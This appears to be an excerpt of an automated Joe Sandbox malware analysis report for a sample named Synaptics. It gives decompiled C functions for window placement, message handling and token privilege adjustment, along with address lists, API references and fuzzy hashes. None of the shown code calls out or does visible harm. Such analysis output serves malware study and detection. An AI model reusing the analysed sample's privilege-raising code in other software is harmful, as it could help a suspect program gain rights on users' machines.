                                                                                                                                                                                          0x0044ec73
                                                                                                                                                                                          0x0044ec51
                                                                                                                                                                                          0x0044ea85
                                                                                                                                                                                          0x0044ef43
                                                                                                                                                                                          0x0044ef46
                                                                                                                                                                                          0x0044ef4a
                                                                                                                                                                                          0x0044ef4d
                                                                                                                                                                                          0x0044ef51
                                                                                                                                                                                          0x0044ef54
                                                                                                                                                                                          0x0044ef55
                                                                                                                                                                                          0x0044ef5a
                                                                                                                                                                                          0x0044ef5a
                                                                                                                                                                                          0x0044ef5d
                                                                                                                                                                                          0x0044ef5f
                                                                                                                                                                                          0x0044ef62
                                                                                                                                                                                          0x0044ef65
                                                                                                                                                                                          0x0044ef72
                                                                                                                                                                                          0x0044ef72
                                                                                                                                                                                          0x0044ea76
                                                                                                                                                                                          0x0044ea6f
                                                                                                                                                                                          0x0044ea6a
                                                                                                                                                                                          0x00000000

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • SaveDC.GDI32(?), ref: 0044ED0F
                                                                                                                                                                                          • RestoreDC.GDI32(?,?), ref: 0044ED83
                                                                                                                                                                                          • 73CCB080.USER32(?,00000000,0044EF73), ref: 0044EDFD
                                                                                                                                                                                          • SaveDC.GDI32(?), ref: 0044EE34
                                                                                                                                                                                          • RestoreDC.GDI32(?,?), ref: 0044EEA1
                                                                                                                                                                                          • NtdllDefWindowProc_A.USER32(?,?,?,?,00000000,0044EF73), ref: 0044EF55
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000002.00000002.495377575.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          • Associated: 00000002.00000002.494336457.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000002.00000002.497313408.000000000049B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000002.00000002.497359973.00000000004A5000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_Synaptics.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: RestoreSave$B080NtdllProc_Window
                                                                                                                                                                                          • String ID: LbC
                                                                                                                                                                                          • API String ID: 4024241980-1054848185
                                                                                                                                                                                          • Opcode ID: 9271bb3190d8798086136275e03b0e8807570e2f302814090e834d2e64d099f3
                                                                                                                                                                                          • Instruction ID: 9827756e5d0f78ec9e29d95b15367e488dbc04d0ac3e4e0047c09454960c1bc5
                                                                                                                                                                                          • Opcode Fuzzy Hash: 9271bb3190d8798086136275e03b0e8807570e2f302814090e834d2e64d099f3
                                                                                                                                                                                          • Instruction Fuzzy Hash: 5AE19D34A04605DFEB10DF6AC8819AEF3F5FF58304B2485AAE805A7361D738ED41CB99
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 00441A14 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 64windowCOMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          C-Code - Quality: 75%
                                                                                                                                                                                          			E00441A14(void* __eax) {
				void* _v28;
				struct _WINDOWPLACEMENT _v56;
				struct tagPOINT _v64;
				intOrPtr _v68;
				void* _t43;
				struct HWND__* _t45;
				struct tagPOINT* _t47;

				_t47 =  &(_v64.y);
				_t43 = __eax;
				if(IsIconic( *(__eax + 0x180)) == 0) {
					GetWindowRect( *(_t43 + 0x180), _t47);
				} else {
					_v56.length = 0x2c;
					GetWindowPlacement( *(_t43 + 0x180),  &_v56);
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
				}
				if((GetWindowLongA( *(_t43 + 0x180), 0xfffffff0) & 0x40000000) != 0) {
					_t45 = GetWindowLongA( *(_t43 + 0x180), 0xfffffff8);
					if(_t45 != 0) {
						ScreenToClient(_t45, _t47);
						ScreenToClient(_t45,  &_v64);
					}
				}
				 *(_t43 + 0x40) = _t47->x;
				 *((intOrPtr*)(_t43 + 0x44)) = _v68;
				 *((intOrPtr*)(_t43 + 0x48)) = _v64.x - _t47->x;
				 *((intOrPtr*)(_t43 + 0x4c)) = _v64.y.x - _v68;
				return E0043A5D0(_t43);
			}










                                                                                                                                                                                          0x00441a17
                                                                                                                                                                                          0x00441a1a
                                                                                                                                                                                          0x00441a2a
                                                                                                                                                                                          0x00441a59
                                                                                                                                                                                          0x00441a2c
                                                                                                                                                                                          0x00441a2c
                                                                                                                                                                                          0x00441a40
                                                                                                                                                                                          0x00441a4b
                                                                                                                                                                                          0x00441a4c
                                                                                                                                                                                          0x00441a4d
                                                                                                                                                                                          0x00441a4e
                                                                                                                                                                                          0x00441a4e
                                                                                                                                                                                          0x00441a71
                                                                                                                                                                                          0x00441a81
                                                                                                                                                                                          0x00441a85
                                                                                                                                                                                          0x00441a89
                                                                                                                                                                                          0x00441a94
                                                                                                                                                                                          0x00441a94
                                                                                                                                                                                          0x00441a85
                                                                                                                                                                                          0x00441a9c
                                                                                                                                                                                          0x00441aa3
                                                                                                                                                                                          0x00441aad
                                                                                                                                                                                          0x00441ab8
                                                                                                                                                                                          0x00441ac8

                                                                                                                                                                                          APIs
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000002.00000002.495377575.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          • Associated: 00000002.00000002.494336457.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000002.00000002.497313408.000000000049B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000002.00000002.497359973.00000000004A5000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_Synaptics.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: Window$ClientLongScreen$IconicPlacementRect
                                                                                                                                                                                          • String ID: ,
                                                                                                                                                                                          • API String ID: 2266315723-3772416878
                                                                                                                                                                                          • Opcode ID: 6db301462595e8e3d12c2eede530c852539780402de9b2505489a1fd75bb3f07
                                                                                                                                                                                          • Instruction ID: 7764449da7fe852df51dbb9cb86ecf5b737bbd4cbd6d31589173a55badb93002
                                                                                                                                                                                          • Opcode Fuzzy Hash: 6db301462595e8e3d12c2eede530c852539780402de9b2505489a1fd75bb3f07
                                                                                                                                                                                          • Instruction Fuzzy Hash: 89118171908200ABDB01DE6DC885A9B77D8AF49354F04453EFD58EB291D739E9008BA6
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 00453DA4 Relevance: 12.5, APIs: 6, Strings: 1, Instructions: 284windowCOMMONCrypto
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          C-Code - Quality: 92%
                                                                                                                                                                                          			E00453DA4(intOrPtr __eax, struct HWND__** __edx) {
				intOrPtr _v8;
				int _v12;
				intOrPtr _v16;
				struct HDC__* _v20;
				struct HWND__* _v24;
				void* __ebp;
				struct HWND__* _t92;
				intOrPtr _t112;
				intOrPtr _t115;
				struct HWND__* _t121;
				struct HWND__* _t124;
				intOrPtr _t128;
				struct HWND__* _t129;
				intOrPtr _t130;
				intOrPtr _t131;
				struct HWND__* _t133;
				struct HWND__* _t136;
				intOrPtr _t142;
				intOrPtr _t172;
				struct HDC__* _t177;
				struct HWND__** _t200;
				struct HWND__* _t218;
				struct HWND__* _t219;
				intOrPtr _t228;
				void* _t230;
				void* _t231;
				intOrPtr _t237;
				intOrPtr _t245;
				struct HWND__* _t249;
				struct HWND__* _t250;
				struct HWND__* _t255;
				struct HWND__* _t256;
				void* _t258;
				void* _t260;
				intOrPtr _t261;
				void* _t263;
				void* _t267;

				_t258 = _t260;
				_t261 = _t260 + 0xffffffec;
				_t200 = __edx;
				_v8 = __eax;
				_t92 =  *__edx;
				_t218 = _t92;
				_t263 = _t218 - 0x46;
				if(_t263 > 0) {
					_t219 = _t218 - 0xb01a;
					__eflags = _t219;
					if(_t219 == 0) {
						__eflags =  *(_v8 + 0xa0);
						if(__eflags != 0) {
							E00403DE8(_v8, __eflags);
						}
					} else {
						__eflags = _t219 == 1;
						if(_t219 == 1) {
							__eflags =  *(_v8 + 0xa0);
							if(__eflags != 0) {
								E00403DE8(_v8, __eflags);
							}
						} else {
							goto L41;
						}
					}
					goto L43;
				} else {
					if(_t263 == 0) {
						_t112 = _v8;
						_t228 =  *0x4541d8; // 0x1
						__eflags = _t228 - ( *(_t112 + 0x1c) &  *0x4541d4);
						if(_t228 == ( *(_t112 + 0x1c) &  *0x4541d4)) {
							_t115 = _v8;
							__eflags =  *((intOrPtr*)(_t115 + 0x230)) - 0xffffffffffffffff;
							if( *((intOrPtr*)(_t115 + 0x230)) - 0xffffffffffffffff < 0) {
								_t128 = _v8;
								__eflags =  *((char*)(_t128 + 0x22b)) - 2;
								if( *((char*)(_t128 + 0x22b)) != 2) {
									_t129 = __edx[2];
									_t26 = _t129 + 0x18;
									 *_t26 =  *(_t129 + 0x18) | 0x00000002;
									__eflags =  *_t26;
								}
							}
							_t121 =  *((intOrPtr*)(_v8 + 0x230)) - 1;
							__eflags = _t121;
							if(_t121 == 0) {
								L30:
								_t124 =  *((intOrPtr*)(_v8 + 0x229)) - 2;
								__eflags = _t124;
								if(_t124 == 0) {
									L32:
									 *( *((intOrPtr*)(_t200 + 8)) + 0x18) =  *( *((intOrPtr*)(_t200 + 8)) + 0x18) | 0x00000001;
								} else {
									__eflags = _t124 == 3;
									if(_t124 == 3) {
										goto L32;
									}
								}
							} else {
								__eflags = _t121 == 2;
								if(_t121 == 2) {
									goto L30;
								}
							}
						}
						goto L43;
					} else {
						_t230 = _t218 + 0xfffffffa - 3;
						if(_t230 < 0) {
							__eflags =  *0x49be6c;
							if( *0x49be6c != 0) {
								__eflags =  *__edx - 7;
								if( *__edx != 7) {
									goto L43;
								} else {
									_t130 = _v8;
									__eflags =  *(_t130 + 0x1c) & 0x00000010;
									if(( *(_t130 + 0x1c) & 0x00000010) != 0) {
										goto L43;
									} else {
										_t255 = 0;
										_t131 = _v8;
										__eflags =  *((char*)(_t131 + 0x22f)) - 2;
										if( *((char*)(_t131 + 0x22f)) != 2) {
											_t133 =  *(_v8 + 0x220);
											__eflags = _t133;
											if(_t133 != 0) {
												__eflags = _t133 - _v8;
												if(_t133 != _v8) {
													_t255 = E00441704(_t133);
												}
											}
										} else {
											_t136 = E004546D0(_v8);
											__eflags = _t136;
											if(_t136 != 0) {
												_t255 = E00441704(E004546D0(_v8));
											}
										}
										__eflags = _t255;
										if(_t255 == 0) {
											goto L43;
										} else {
											_t92 = SetFocus(_t255);
										}
									}
								}
							}
							goto L44;
						} else {
							_t231 = _t230 - 0x22;
							if(_t231 == 0) {
								_v24 = __edx[2];
								__eflags = _v24->i - 1;
								if(_v24->i != 1) {
									goto L43;
								} else {
									_t142 = _v8;
									__eflags =  *(_t142 + 0x248);
									if( *(_t142 + 0x248) == 0) {
										goto L43;
									} else {
										_t249 = E0044DD30( *((intOrPtr*)(_v8 + 0x248)), 0,  *((intOrPtr*)(_v24 + 8)));
										__eflags = _t249;
										if(_t249 == 0) {
											goto L43;
										} else {
											_v16 = E0042572C(0, 1);
											_push(_t258);
											_push(0x45401d);
											_push( *[fs:eax]);
											 *[fs:eax] = _t261;
											_v12 = SaveDC( *(_v24 + 0x18));
											_push(_t258);
											_push(0x454000);
											_push( *[fs:eax]);
											 *[fs:eax] = _t261;
											E00425CE8(_v16,  *(_v24 + 0x18));
											E00425B88(_v16);
											E0044F218(_t249, _v24 + 0x1c, _v16,  *((intOrPtr*)(_v24 + 0x10)));
											_pop(_t237);
											 *[fs:eax] = _t237;
											_push(0x454007);
											__eflags = 0;
											E00425CE8(_v16, 0);
											return RestoreDC( *(_v24 + 0x18), _v12);
										}
									}
								}
							} else {
								if(_t231 == 1) {
									_t256 = __edx[2];
									__eflags = _t256->i - 1;
									if(_t256->i != 1) {
										goto L43;
									} else {
										_t172 = _v8;
										__eflags =  *(_t172 + 0x248);
										if( *(_t172 + 0x248) == 0) {
											goto L43;
										} else {
											_t250 = E0044DD30( *((intOrPtr*)(_v8 + 0x248)), 0,  *((intOrPtr*)(_t256 + 8)));
											__eflags = _t250;
											if(_t250 == 0) {
												goto L43;
											} else {
												_t177 = E00441704(_v8);
												L00407730();
												_v20 = _t177;
												 *[fs:eax] = _t261;
												_v16 = E0042572C(0, 1);
												 *[fs:eax] = _t261;
												_v12 = SaveDC(_v20);
												 *[fs:eax] = _t261;
												E00425CE8(_v16, _v20);
												E00425B88(_v16);
												 *((intOrPtr*)(_t250->i + 0x38))(_t256 + 0x10,  *[fs:eax], 0x454107, _t258,  *[fs:eax], 0x454124, _t258,  *[fs:eax], 0x45414b, _t258, _t177);
												_pop(_t245);
												 *[fs:eax] = _t245;
												_push(0x45410e);
												__eflags = 0;
												E00425CE8(_v16, 0);
												return RestoreDC(_v20, _v12);
											}
										}
									}
								} else {
									L41:
									_t267 = _t92 -  *0x49ebc4; // 0xc089
									if(_t267 == 0) {
										E0043C130(_v8, 0, 0xb025, 0);
										E0043C130(_v8, 0, 0xb024, 0);
										E0043C130(_v8, 0, 0xb035, 0);
										E0043C130(_v8, 0, 0xb009, 0);
										E0043C130(_v8, 0, 0xb008, 0);
										E0043C130(_v8, 0, 0xb03d, 0);
									}
									L43:
									_t92 = E0043F118(_v8, _t200);
									L44:
									return _t92;
								}
							}
						}
					}
				}
			}








































                                                                                                                                                                                          0x00453da5
                                                                                                                                                                                          0x00453da7
                                                                                                                                                                                          0x00453dad
                                                                                                                                                                                          0x00453daf
                                                                                                                                                                                          0x00453db2
                                                                                                                                                                                          0x00453db4
                                                                                                                                                                                          0x00453db6
                                                                                                                                                                                          0x00453db9
                                                                                                                                                                                          0x00453dde
                                                                                                                                                                                          0x00453dde
                                                                                                                                                                                          0x00453de4
                                                                                                                                                                                          0x00453e90
                                                                                                                                                                                          0x00453e97
                                                                                                                                                                                          0x00453ea4
                                                                                                                                                                                          0x00453ea4
                                                                                                                                                                                          0x00453dea
                                                                                                                                                                                          0x00453dea
                                                                                                                                                                                          0x00453deb
                                                                                                                                                                                          0x00453e6f
                                                                                                                                                                                          0x00453e76
                                                                                                                                                                                          0x00453e83
                                                                                                                                                                                          0x00453e83
                                                                                                                                                                                          0x00453ded
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00453ded
                                                                                                                                                                                          0x00453deb
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00453dbb
                                                                                                                                                                                          0x00453dbb
                                                                                                                                                                                          0x00453eae
                                                                                                                                                                                          0x00453ebc
                                                                                                                                                                                          0x00453ec3
                                                                                                                                                                                          0x00453ec6
                                                                                                                                                                                          0x00453ecc
                                                                                                                                                                                          0x00453ed6
                                                                                                                                                                                          0x00453ed8
                                                                                                                                                                                          0x00453eda
                                                                                                                                                                                          0x00453edd
                                                                                                                                                                                          0x00453ee4
                                                                                                                                                                                          0x00453ee6
                                                                                                                                                                                          0x00453ee9
                                                                                                                                                                                          0x00453ee9
                                                                                                                                                                                          0x00453ee9
                                                                                                                                                                                          0x00453ee9
                                                                                                                                                                                          0x00453ee4
                                                                                                                                                                                          0x00453ef6
                                                                                                                                                                                          0x00453ef6
                                                                                                                                                                                          0x00453ef8
                                                                                                                                                                                          0x00453f02
                                                                                                                                                                                          0x00453f0b
                                                                                                                                                                                          0x00453f0b
                                                                                                                                                                                          0x00453f0d
                                                                                                                                                                                          0x00453f17
                                                                                                                                                                                          0x00453f1a
                                                                                                                                                                                          0x00453f0f
                                                                                                                                                                                          0x00453f0f
                                                                                                                                                                                          0x00453f11
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00453f11
                                                                                                                                                                                          0x00453efa
                                                                                                                                                                                          0x00453efa
                                                                                                                                                                                          0x00453efc
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00453efc
                                                                                                                                                                                          0x00453ef8
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00453dc1
                                                                                                                                                                                          0x00453dc4
                                                                                                                                                                                          0x00453dc7
                                                                                                                                                                                          0x00453df2
                                                                                                                                                                                          0x00453df9
                                                                                                                                                                                          0x00453dff
                                                                                                                                                                                          0x00453e02
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00453e08
                                                                                                                                                                                          0x00453e08
                                                                                                                                                                                          0x00453e0b
                                                                                                                                                                                          0x00453e0f
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00453e15
                                                                                                                                                                                          0x00453e15
                                                                                                                                                                                          0x00453e17
                                                                                                                                                                                          0x00453e1a
                                                                                                                                                                                          0x00453e21
                                                                                                                                                                                          0x00453e43
                                                                                                                                                                                          0x00453e49
                                                                                                                                                                                          0x00453e4b
                                                                                                                                                                                          0x00453e4d
                                                                                                                                                                                          0x00453e50
                                                                                                                                                                                          0x00453e57
                                                                                                                                                                                          0x00453e57
                                                                                                                                                                                          0x00453e50
                                                                                                                                                                                          0x00453e23
                                                                                                                                                                                          0x00453e26
                                                                                                                                                                                          0x00453e2b
                                                                                                                                                                                          0x00453e2d
                                                                                                                                                                                          0x00453e3c
                                                                                                                                                                                          0x00453e3c
                                                                                                                                                                                          0x00453e2d
                                                                                                                                                                                          0x00453e59
                                                                                                                                                                                          0x00453e5b
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00453e61
                                                                                                                                                                                          0x00453e62
                                                                                                                                                                                          0x00453e62
                                                                                                                                                                                          0x00453e5b
                                                                                                                                                                                          0x00453e0f
                                                                                                                                                                                          0x00453e02
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00453dc9
                                                                                                                                                                                          0x00453dc9
                                                                                                                                                                                          0x00453dcc
                                                                                                                                                                                          0x00453f26
                                                                                                                                                                                          0x00453f2c
                                                                                                                                                                                          0x00453f2f
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00453f35
                                                                                                                                                                                          0x00453f35
                                                                                                                                                                                          0x00453f38
                                                                                                                                                                                          0x00453f3f
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00453f45
                                                                                                                                                                                          0x00453f5b
                                                                                                                                                                                          0x00453f5d
                                                                                                                                                                                          0x00453f5f
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00453f65
                                                                                                                                                                                          0x00453f71
                                                                                                                                                                                          0x00453f76
                                                                                                                                                                                          0x00453f77
                                                                                                                                                                                          0x00453f7c
                                                                                                                                                                                          0x00453f7f
                                                                                                                                                                                          0x00453f8e
                                                                                                                                                                                          0x00453f93
                                                                                                                                                                                          0x00453f94
                                                                                                                                                                                          0x00453f99
                                                                                                                                                                                          0x00453f9c
                                                                                                                                                                                          0x00453fa8
                                                                                                                                                                                          0x00453fbb
                                                                                                                                                                                          0x00453fd3
                                                                                                                                                                                          0x00453fda
                                                                                                                                                                                          0x00453fdd
                                                                                                                                                                                          0x00453fe0
                                                                                                                                                                                          0x00453fe5
                                                                                                                                                                                          0x00453fea
                                                                                                                                                                                          0x00453fff
                                                                                                                                                                                          0x00453fff
                                                                                                                                                                                          0x00453f5f
                                                                                                                                                                                          0x00453f3f
                                                                                                                                                                                          0x00453dd2
                                                                                                                                                                                          0x00453dd3
                                                                                                                                                                                          0x00454024
                                                                                                                                                                                          0x00454027
                                                                                                                                                                                          0x0045402a
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00454030
                                                                                                                                                                                          0x00454030
                                                                                                                                                                                          0x00454033
                                                                                                                                                                                          0x0045403a
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00454040
                                                                                                                                                                                          0x00454053
                                                                                                                                                                                          0x00454055
                                                                                                                                                                                          0x00454057
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x0045405d
                                                                                                                                                                                          0x00454060
                                                                                                                                                                                          0x00454066
                                                                                                                                                                                          0x0045406b
                                                                                                                                                                                          0x00454079
                                                                                                                                                                                          0x00454088
                                                                                                                                                                                          0x00454096
                                                                                                                                                                                          0x004540a2
                                                                                                                                                                                          0x004540b0
                                                                                                                                                                                          0x004540b9
                                                                                                                                                                                          0x004540cc
                                                                                                                                                                                          0x004540df
                                                                                                                                                                                          0x004540e4
                                                                                                                                                                                          0x004540e7
                                                                                                                                                                                          0x004540ea
                                                                                                                                                                                          0x004540ef
                                                                                                                                                                                          0x004540f4
                                                                                                                                                                                          0x00454106
                                                                                                                                                                                          0x00454106
                                                                                                                                                                                          0x00454057
                                                                                                                                                                                          0x0045403a
                                                                                                                                                                                          0x00453dd9
                                                                                                                                                                                          0x00454152
                                                                                                                                                                                          0x00454152
                                                                                                                                                                                          0x00454158
                                                                                                                                                                                          0x00454166
                                                                                                                                                                                          0x00454177
                                                                                                                                                                                          0x00454188
                                                                                                                                                                                          0x00454199
                                                                                                                                                                                          0x004541aa
                                                                                                                                                                                          0x004541bb
                                                                                                                                                                                          0x004541bb
                                                                                                                                                                                          0x004541c0
                                                                                                                                                                                          0x004541c5
                                                                                                                                                                                          0x004541ca
                                                                                                                                                                                          0x004541d0
                                                                                                                                                                                          0x004541d0
                                                                                                                                                                                          0x00453dd3
                                                                                                                                                                                          0x00453dcc
                                                                                                                                                                                          0x00453dc7
                                                                                                                                                                                          0x00453dbb

                                                                                                                                                                                          APIs
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000002.00000002.495377575.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          • Associated: 00000002.00000002.494336457.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000002.00000002.497313408.000000000049B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000002.00000002.497359973.00000000004A5000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_Synaptics.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: RestoreSave$B080Focus
                                                                                                                                                                                          • String ID: LbC
                                                                                                                                                                                          • API String ID: 809140284-1054848185
                                                                                                                                                                                          • Opcode ID: 9ec593775dbac7e468da3440c33bd0948fb5aeb1ddc2f22738828f1b73fdd268
                                                                                                                                                                                          • Instruction ID: b33e20edd2ce9fca5c714fd75ef70db920f5be85b1e855ee555859ce0c1c913c
                                                                                                                                                                                          • Opcode Fuzzy Hash: 9ec593775dbac7e468da3440c33bd0948fb5aeb1ddc2f22738828f1b73fdd268
                                                                                                                                                                                          • Instruction Fuzzy Hash: 56B1D730A00504DFCB10DFA9D889AAFB7F5EB58305F5545A6F800AB352C738AE85DF58
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 00475958 Relevance: 10.6, APIs: 7, Instructions: 105COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          C-Code - Quality: 61%
                                                                                                                                                                                          			E00475958(char __eax, void* __ebx, char __edx, void* __edi, void* __esi) {
				char _v8;
				char _v9;
				void* _v16;
				long _v20;
				intOrPtr _v24;
				struct _TOKEN_PRIVILEGES _v36;
				struct _TOKEN_PRIVILEGES _v52;
				char _v56;
				intOrPtr* _t30;
				intOrPtr _t71;
				intOrPtr _t74;
				void* _t80;
				void* _t81;
				intOrPtr _t82;
				void* _t86;

				_t80 = _t81;
				_t82 = _t81 + 0xffffffcc;
				_v56 = 0;
				_v9 = __edx;
				_v8 = __eax;
				E00404E70(_v8);
				_push(_t80);
				_push(0x475a82);
				_push( *[fs:eax]);
				 *[fs:eax] = _t82;
				_t30 =  *0x49de34; // 0x49b0ec
				if( *_t30 != 2) {
					L11:
					_pop(_t71);
					 *[fs:eax] = _t71;
					_push(E00475A89);
					E004049C0( &_v56);
					return E004049C0( &_v8);
				} else {
					if(OpenProcessToken(GetCurrentProcess(), 0x28,  &_v16) == 0) {
						if((0 | GetLastError() == 0x00000000) == 0) {
							E0040C918(GetLastError(),  &_v56);
							E0040D144(_v56, 1);
							E00404378();
						}
						goto L11;
					} else {
						_push(_t80);
						_push(0x475a2e);
						_push( *[fs:eax]);
						 *[fs:eax] = _t82;
						if(LookupPrivilegeValueA(0, E00404E80(_v8),  &(_v36.Privileges)) != 0) {
							_v36.PrivilegeCount = 1;
							_t86 = _v9 - 1;
							if(_t86 < 0) {
								_v24 = 0;
							} else {
								if(_t86 == 0) {
									_v24 = 2;
								}
							}
							_v20 = 0;
							asm("movsd");
							asm("movsd");
							asm("movsd");
							asm("movsd");
							AdjustTokenPrivileges(_v16, 0,  &_v36, 0x10,  &_v52,  &_v20);
						}
						_pop(_t74);
						 *[fs:eax] = _t74;
						_push(E00475A35);
						return CloseHandle(_v16);
					}
				}
			}


















                                                                                                                                                                                          0x00475959
                                                                                                                                                                                          0x0047595b
                                                                                                                                                                                          0x00475963
                                                                                                                                                                                          0x00475966
                                                                                                                                                                                          0x00475969
                                                                                                                                                                                          0x0047596f
                                                                                                                                                                                          0x00475976
                                                                                                                                                                                          0x00475977
                                                                                                                                                                                          0x0047597c
                                                                                                                                                                                          0x0047597f
                                                                                                                                                                                          0x00475984
                                                                                                                                                                                          0x0047598c
                                                                                                                                                                                          0x00475a64
                                                                                                                                                                                          0x00475a66
                                                                                                                                                                                          0x00475a69
                                                                                                                                                                                          0x00475a6c
                                                                                                                                                                                          0x00475a74
                                                                                                                                                                                          0x00475a81
                                                                                                                                                                                          0x00475992
                                                                                                                                                                                          0x004759a5
                                                                                                                                                                                          0x00475a41
                                                                                                                                                                                          0x00475a4b
                                                                                                                                                                                          0x00475a5a
                                                                                                                                                                                          0x00475a5f
                                                                                                                                                                                          0x00475a5f
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x004759ab
                                                                                                                                                                                          0x004759ad
                                                                                                                                                                                          0x004759ae
                                                                                                                                                                                          0x004759b3
                                                                                                                                                                                          0x004759b6
                                                                                                                                                                                          0x004759cf
                                                                                                                                                                                          0x004759d1
                                                                                                                                                                                          0x004759db
                                                                                                                                                                                          0x004759dd
                                                                                                                                                                                          0x004759ec
                                                                                                                                                                                          0x004759df
                                                                                                                                                                                          0x004759df
                                                                                                                                                                                          0x004759e1
                                                                                                                                                                                          0x004759e1
                                                                                                                                                                                          0x004759df
                                                                                                                                                                                          0x004759f1
                                                                                                                                                                                          0x004759fa
                                                                                                                                                                                          0x004759fb
                                                                                                                                                                                          0x004759fc
                                                                                                                                                                                          0x004759fd
                                                                                                                                                                                          0x00475a12
                                                                                                                                                                                          0x00475a12
                                                                                                                                                                                          0x00475a19
                                                                                                                                                                                          0x00475a1c
                                                                                                                                                                                          0x00475a1f
                                                                                                                                                                                          0x00475a2d
                                                                                                                                                                                          0x00475a2d
                                                                                                                                                                                          0x004759a5

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • GetCurrentProcess.KERNEL32(00000028,?,00000000,00475A82,?,?,00000000,022B2354), ref: 00475998
                                                                                                                                                                                          • OpenProcessToken.ADVAPI32(00000000,00000028,?,00000000,00475A82,?,?,00000000,022B2354), ref: 0047599E
                                                                                                                                                                                          • LookupPrivilegeValueA.ADVAPI32(00000000,00000000,?), ref: 004759C8
                                                                                                                                                                                          • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000010,?,?,00000000,00475A2E,?,00000000,00000028,?,00000000,00475A82), ref: 00475A12
                                                                                                                                                                                          • CloseHandle.KERNEL32(?,00475A35,00000000,00000028,?,00000000,00475A82,?,?,00000000,022B2354), ref: 00475A28
                                                                                                                                                                                          • GetLastError.KERNEL32(00000000,00000028,?,00000000,00475A82,?,?,00000000,022B2354), ref: 00475A35
                                                                                                                                                                                          • GetLastError.KERNEL32(00000000,00000028,?,00000000,00475A82,?,?,00000000,022B2354), ref: 00475A43
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000002.00000002.495377575.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          • Associated: 00000002.00000002.494336457.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000002.00000002.497313408.000000000049B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000002.00000002.497359973.00000000004A5000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_Synaptics.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: ErrorLastProcessToken$AdjustCloseCurrentHandleLookupOpenPrivilegePrivilegesValue
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 1944759421-0
                                                                                                                                                                                          • Opcode ID: 8a81bdb866fff7d6735d4f9ff79d33825cf0af72ddee7089733f24c20b3a4484
                                                                                                                                                                                          • Instruction ID: 3c61c7cdd0eda20fe66ef621c1da0ff4ff2913ef0bcb8c05ec3cca93a53440b9
